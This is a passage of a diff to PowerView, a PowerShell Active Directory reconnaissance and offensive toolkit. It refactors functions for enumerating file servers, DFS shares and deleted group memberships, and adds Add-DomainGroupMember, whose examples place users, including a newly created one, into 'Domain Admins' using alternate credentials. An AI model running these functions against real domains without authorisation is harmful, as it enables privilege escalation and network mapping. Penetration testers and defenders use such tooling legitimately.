+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+.OUTPUTS
+
+PowerView.DomainGroupMemberDeleted
+
+Custom PSObject with translated replication metadata fields.
+
+.LINK
+
+https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.DomainGroupMemberDeleted')]
[CmdletBinding()]
- param(
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
- [String[]]
- $TargetUsers,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
- [ValidateRange(1,10000)]
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- function SplitPath {
- # short internal helper to split UNC server paths
- param([String]$Path)
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'msds-replvaluemetadata','distinguishedname'
+ 'Raw' = $True
+ 'LDAPFilter' = '(objectCategory=group)'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ }
- if ($Path -and ($Path.split("\\").Count -ge 3)) {
- $Temp = $Path.split("\\")[2]
- if($Temp -and ($Temp -ne '')) {
- $Temp
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ $ObjectDN = $_.Properties['distinguishedname'][0]
+ ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {
+ $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue
+ if ($TempObject) {
+ if (($TempObject.pszAttributeName -Match 'member') -and (($TempObject.dwVersion % 2) -eq 0 )) {
+ $Output = New-Object PSObject
+ $Output | Add-Member NoteProperty 'GroupDN' $ObjectDN
+ $Output | Add-Member NoteProperty 'MemberDN' $TempObject.pszObjectDn
+ $Output | Add-Member NoteProperty 'TimeFirstAdded' $TempObject.ftimeCreated
+ $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted
+ $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
+ $Output | Add-Member NoteProperty 'TimesAdded' ($TempObject.dwVersion / 2)
+ $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted')
+ $Output
+ }
+ }
+ else {
+ Write-Verbose "[Get-DomainGroupMemberDeleted] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'"
+ }
}
}
}
- $filter = "(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(scriptpath=*)(homedirectory=*)(profilepath=*))"
- Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -Filter $filter | Where-Object {$_} | Where-Object {
- # filter for any target users
- if($TargetUsers) {
- $TargetUsers -Match $_.samAccountName
- }
- else { $True }
- } | ForEach-Object {
- # split out every potential file server path
- if($_.homedirectory) {
- SplitPath($_.homedirectory)
- }
- if($_.scriptpath) {
- SplitPath($_.scriptpath)
- }
- if($_.profilepath) {
- SplitPath($_.profilepath)
- }
-
- } | Where-Object {$_} | Sort-Object -Unique
}
-function Get-DFSshare {
+function Add-DomainGroupMember {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Adds a domain user (or group) to an existing domain group, assuming
+appropriate permissions to do so.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
- Returns a list of all fault-tolerant distributed file
- systems for a given domain.
+.DESCRIPTION
- .PARAMETER Version
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified -GroupIdentity,
+which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For
+each entry in -Members, each member identity is similarly searched for and added
+to the group.
- The version of DFS to query for servers.
- 1/v1, 2/v2, or all
+.PARAMETER Identity
- .PARAMETER Domain
+A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to add members to.
- The domain to query for user DFS shares, defaults to the current domain.
+.PARAMETER Members
- .PARAMETER DomainController
+One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName
+(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114),
+or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
- Domain controller to reflect LDAP queries through.
+.PARAMETER Domain
- .PARAMETER ADSpath
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER Credential
- .PARAMETER PageSize
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- The PageSize to set for the LDAP searcher object.
+.EXAMPLE
- .PARAMETER Credential
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Adds harmj0y to 'Domain Admins' in the current domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-DFSshare
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
- Returns all distributed file system shares for the current domain.
+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-DFSshare -Domain test
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
- Returns all distributed file system shares for the 'test' domain.
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+.LINK
+
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
- param(
+ Param(
+ [Parameter(Position = 0, Mandatory = $True)]
+ [Alias('GroupName', 'GroupIdentity')]
[String]
- [ValidateSet("All","V1","1","V2","2")]
- $Version = "All",
+ $Identity,
- [String]
- $Domain,
-
- [String]
- $DomainController,
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('MemberIdentity', 'Member', 'DistinguishedName')]
+ [String[]]
+ $Members,
+ [ValidateNotNullOrEmpty()]
[String]
- $ADSpath,
-
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
+ $Domain,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- function Parse-Pkt {
- [CmdletBinding()]
- param(
- [byte[]]
- $Pkt
- )
-
- $bin = $Pkt
- $blob_version = [bitconverter]::ToUInt32($bin[0..3],0)
- $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)
- $offset = 8
- #https://msdn.microsoft.com/en-us/library/cc227147.aspx
- $object_list = @()
- for($i=1; $i -le $blob_element_count; $i++){
- $blob_name_size_start = $offset
- $blob_name_size_end = $offset + 1
- $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)
-
- $blob_name_start = $blob_name_size_end + 1
- $blob_name_end = $blob_name_start + $blob_name_size - 1
- $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])
-
- $blob_data_size_start = $blob_name_end + 1
- $blob_data_size_end = $blob_data_size_start + 3
- $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)
-
- $blob_data_start = $blob_data_size_end + 1
- $blob_data_end = $blob_data_start + $blob_data_size - 1
- $blob_data = $bin[$blob_data_start..$blob_data_end]
- switch -wildcard ($blob_name) {
- "\siteroot" { }
- "\domainroot*" {
- # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...
- # DFSRootOrLinkIDBlob
- $root_or_link_guid_start = 0
- $root_or_link_guid_end = 15
- $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]
- $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str
- $prefix_size_start = $root_or_link_guid_end + 1
- $prefix_size_end = $prefix_size_start + 1
- $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)
- $prefix_start = $prefix_size_end + 1
- $prefix_end = $prefix_start + $prefix_size - 1
- $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])
-
- $short_prefix_size_start = $prefix_end + 1
- $short_prefix_size_end = $short_prefix_size_start + 1
- $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)
- $short_prefix_start = $short_prefix_size_end + 1
- $short_prefix_end = $short_prefix_start + $short_prefix_size - 1
- $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])
-
- $type_start = $short_prefix_end + 1
- $type_end = $type_start + 3
- $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)
-
- $state_start = $type_end + 1
- $state_end = $state_start + 3
- $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)
-
- $comment_size_start = $state_end + 1
- $comment_size_end = $comment_size_start + 1
- $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)
- $comment_start = $comment_size_end + 1
- $comment_end = $comment_start + $comment_size - 1
- if ($comment_size -gt 0) {
- $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])
- }
- $prefix_timestamp_start = $comment_end + 1
- $prefix_timestamp_end = $prefix_timestamp_start + 7
- # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME
- $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime
- $state_timestamp_start = $prefix_timestamp_end + 1
- $state_timestamp_end = $state_timestamp_start + 7
- $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]
- $comment_timestamp_start = $state_timestamp_end + 1
- $comment_timestamp_end = $comment_timestamp_start + 7
- $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]
- $version_start = $comment_timestamp_end + 1
- $version_end = $version_start + 3
- $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)
-
- # Parse rest of DFSNamespaceRootOrLinkBlob here
- $dfs_targetlist_blob_size_start = $version_end + 1
- $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3
- $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)
-
- $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1
- $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1
- $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]
- $reserved_blob_size_start = $dfs_targetlist_blob_end + 1
- $reserved_blob_size_end = $reserved_blob_size_start + 3
- $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)
-
- $reserved_blob_start = $reserved_blob_size_end + 1
- $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1
- $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]
- $referral_ttl_start = $reserved_blob_end + 1
- $referral_ttl_end = $referral_ttl_start + 3
- $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)
-
- #Parse DFSTargetListBlob
- $target_count_start = 0
- $target_count_end = $target_count_start + 3
- $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)
- $t_offset = $target_count_end + 1
-
- for($j=1; $j -le $target_count; $j++){
- $target_entry_size_start = $t_offset
- $target_entry_size_end = $target_entry_size_start + 3
- $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)
- $target_time_stamp_start = $target_entry_size_end + 1
- $target_time_stamp_end = $target_time_stamp_start + 7
- # FILETIME again or special if priority rank and priority class 0
- $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]
- $target_state_start = $target_time_stamp_end + 1
- $target_state_end = $target_state_start + 3
- $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)
-
- $target_type_start = $target_state_end + 1
- $target_type_end = $target_type_start + 3
- $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)
-
- $server_name_size_start = $target_type_end + 1
- $server_name_size_end = $server_name_size_start + 1
- $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)
-
- $server_name_start = $server_name_size_end + 1
- $server_name_end = $server_name_start + $server_name_size - 1
- $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])
-
- $share_name_size_start = $server_name_end + 1
- $share_name_size_end = $share_name_size_start + 1
- $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)
- $share_name_start = $share_name_size_end + 1
- $share_name_end = $share_name_start + $share_name_size - 1
- $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])
-
- $target_list += "\\$server_name\$share_name"
- $t_offset = $share_name_end + 1
- }
- }
- }
- $offset = $blob_data_end + 1
- $dfs_pkt_properties = @{
- 'Name' = $blob_name
- 'Prefix' = $prefix
- 'TargetList' = $target_list
- }
- $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties
- $prefix = $null
- $blob_name = $null
- $target_list = $null
- }
-
- $servers = @()
- $object_list | ForEach-Object {
- if ($_.TargetList) {
- $_.TargetList | ForEach-Object {
- $servers += $_.split("\")[2]
- }
- }
- }
-
- $servers
- }
-
- function Get-DFSshareV1 {
- [CmdletBinding()]
- param(
- [String]
- $Domain,
-
- [String]
- $DomainController,
-
- [String]
- $ADSpath,
-
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
-
- [Management.Automation.PSCredential]
- $Credential
- )
-
- $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+ BEGIN {
+ $ContextArguments = @{
+ 'Identity' = $Identity
+ }
+ if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
- if($DFSsearcher) {
- $DFSshares = @()
- $DFSsearcher.filter = "(&(objectClass=fTDfs))"
+ $GroupContext = Get-PrincipalContext @ContextArguments
+ if ($GroupContext) {
try {
- $Results = $DFSSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- $Properties = $_.Properties
- $RemoteNames = $Properties.remoteservername
- $Pkt = $Properties.pkt
+ $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity)
+ }
+ catch {
+ Write-Warning "[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_"
+ }
+ }
+ }
- $DFSshares += $RemoteNames | ForEach-Object {
- try {
- if ( $_.Contains('\') ) {
- New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split("\")[2]}
- }
- }
- catch {
- Write-Verbose "Error in parsing DFS share : $_"
- }
+ PROCESS {
+ if ($Group) {
+ ForEach ($Member in $Members) {
+ if ($Member -match '.+\\.+') {
+ $ContextArguments['Identity'] = $Member
+ $UserContext = Get-PrincipalContext @ContextArguments
+ if ($UserContext) {
+ $UserIdentity = $UserContext.Identity
}
}
- $Results.dispose()
- $DFSSearcher.dispose()
-
- if($pkt -and $pkt[0]) {
- Parse-Pkt $pkt[0] | ForEach-Object {
- # If a folder doesn't have a redirection it will
- # have a target like
- # \\null\TestNameSpace\folder\.DFSFolderLink so we
- # do actually want to match on "null" rather than
- # $null
- if ($_ -ne "null") {
- New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}
- }
- }
+ else {
+ $UserContext = $GroupContext
+ $UserIdentity = $Member
}
+ Write-Verbose "[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'"
+ $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity)
+ $Group.Members.Add($Member)
+ $Group.Save()
}
- catch {
- Write-Warning "Get-DFSshareV1 error : $_"
- }
- $DFSshares | Sort-Object -Property "RemoteServerName"
}
}
+}
- function Get-DFSshareV2 {
- [CmdletBinding()]
- param(
- [String]
- $Domain,
- [String]
- $DomainController,
+function Get-DomainFileServer {
+<#
+.SYNOPSIS
- [String]
- $ADSpath,
+Returns a list of servers likely functioning as file servers.
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
- [Management.Automation.PSCredential]
- $Credential
- )
+.DESCRIPTION
- $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+Returns a list of likely fileservers by searching for all users in Active Directory
+with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
+the server names.
- if($DFSsearcher) {
- $DFSshares = @()
- $DFSsearcher.filter = "(&(objectClass=msDFS-Linkv2))"
- $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))
+.PARAMETER Domain
- try {
- $Results = $DFSSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- $Properties = $_.Properties
- $target_list = $Properties.'msdfs-targetlistv2'[0]
- $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])
- $DFSshares += $xml.targets.ChildNodes | ForEach-Object {
- try {
- $Target = $_.InnerText
- if ( $Target.Contains('\') ) {
- $DFSroot = $Target.split("\")[3]
- $ShareName = $Properties.'msdfs-linkpathv2'[0]
- New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split("\")[2]}
- }
- }
- catch {
- Write-Verbose "Error in parsing target : $_"
- }
- }
- }
- $Results.dispose()
- $DFSSearcher.dispose()
- }
- catch {
- Write-Warning "Get-DFSshareV2 error : $_"
- }
- $DFSshares | Sort-Object -Unique -Property "RemoteServerName"
- }
- }
+Specifies the domain to use for the query, defaults to the current domain.
- $DFSshares = @()
+.PARAMETER LDAPFilter
- if ( ($Version -eq "all") -or ($Version.endsWith("1")) ) {
- $DFSshares += Get-DFSshareV1 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
- }
- if ( ($Version -eq "all") -or ($Version.endsWith("2")) ) {
- $DFSshares += Get-DFSshareV2 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
- }
+Specifies an LDAP query string that is used to filter Active Directory objects.
- $DFSshares | Sort-Object -Property ("RemoteServerName","Name") -Unique
-}
+.PARAMETER SearchBase
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
-########################################################
-#
-# GPO related functions.
-#
-########################################################
+.PARAMETER Server
+Specifies an Active Directory server (domain controller) to bind to.
-filter Get-GptTmpl {
-<#
- .SYNOPSIS
+.PARAMETER SearchScope
- Helper to parse a GptTmpl.inf policy file path into a custom object.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER GptTmplPath
+.PARAMETER ResultPageSize
- The GptTmpl.inf file path name to parse.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER UsePSDrive
+.PARAMETER ServerTimeLimit
- Switch. Mount the target GptTmpl folder path as a temporary PSDrive.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .EXAMPLE
+.PARAMETER Tombstone
- PS C:\> Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- Parse the default domain policy .inf for dev.testlab.local
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainFileServer
+
+Returns active file servers for the current domain.
+
+.EXAMPLE
+
+Get-DomainFileServer -Domain testing.local
+
+Returns active file servers for the 'testing.local' domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainFileServer -Credential $Cred
+
+.OUTPUTS
+
+String
+
+One or more strings representing file server names.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([String])]
[CmdletBinding()]
- Param (
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+ Param(
+ [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainName', 'Name')]
+ [String[]]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $GptTmplPath,
+ $LDAPFilter,
- [Switch]
- $UsePSDrive
- )
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
- if($UsePSDrive) {
- # if we're PSDrives, create a temporary mount point
- $Parts = $GptTmplPath.split('\')
- $FolderPath = $Parts[0..($Parts.length-2)] -join '\'
- $FilePath = $Parts[-1]
- $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- Write-Verbose "Mounting path $GptTmplPath using a temp PSDrive at $RandDrive"
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- try {
- $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop
- }
- catch {
- Write-Verbose "Error mounting path $GptTmplPath : $_"
- return $Null
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- # so we can cd/dir the new drive
- $TargetGptTmplPath = $RandDrive + ":\" + $FilePath
- }
- else {
- $TargetGptTmplPath = $GptTmplPath
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- Write-Verbose "GptTmplPath: $GptTmplPath"
+ [Switch]
+ $Tombstone,
- try {
- Write-Verbose "Parsing $TargetGptTmplPath"
- $TargetGptTmplPath | Get-IniContent -ErrorAction SilentlyContinue
- }
- catch {
- Write-Verbose "Error parsing $TargetGptTmplPath : $_"
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ function Split-Path {
+ # short internal helper to split UNC server paths
+ Param([String]$Path)
+
+ if ($Path -and ($Path.split('\\').Count -ge 3)) {
+ $Temp = $Path.split('\\')[2]
+ if ($Temp -and ($Temp -ne '')) {
+ $Temp
+ }
+ }
+ }
+
+ $SearcherArguments = @{
+ 'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))'
+ 'Properties' = 'homedirectory,scriptpath,profilepath'
+ }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
}
- if($UsePSDrive -and $RandDrive) {
- Write-Verbose "Removing temp PSDrive $RandDrive"
- Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ ForEach ($TargetDomain in $Domain) {
+ $SearcherArguments['Domain'] = $TargetDomain
+ $UserSearcher = Get-DomainSearcher @SearcherArguments
+ # get all results w/o the pipeline and uniquify them (I know it's not pretty)
+ $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique
+ }
+ }
+ else {
+ $UserSearcher = Get-DomainSearcher @SearcherArguments
+ $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique
+ }
}
}
-filter Get-GroupsXML {
+function Get-DomainDFSShare {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns a list of all fault-tolerant distributed file systems
+for the current (or specified) domains.
+
+Author: Ben Campbell (@meatballs__)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+.DESCRIPTION
+
+This function searches for all distributed file systems (either version
+1, 2, or both depending on -Version X) by searching for domain objects
+matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
+The server data is parsed appropriately and returned.
+
+.PARAMETER Domain
+
+Specifies the domains to use for the query, defaults to the current domain.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- Helper to parse a groups.xml file path into a custom object.
+.PARAMETER Credential
- .PARAMETER GroupsXMLpath
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- The groups.xml file path name to parse.
+.EXAMPLE
- .PARAMETER UsePSDrive
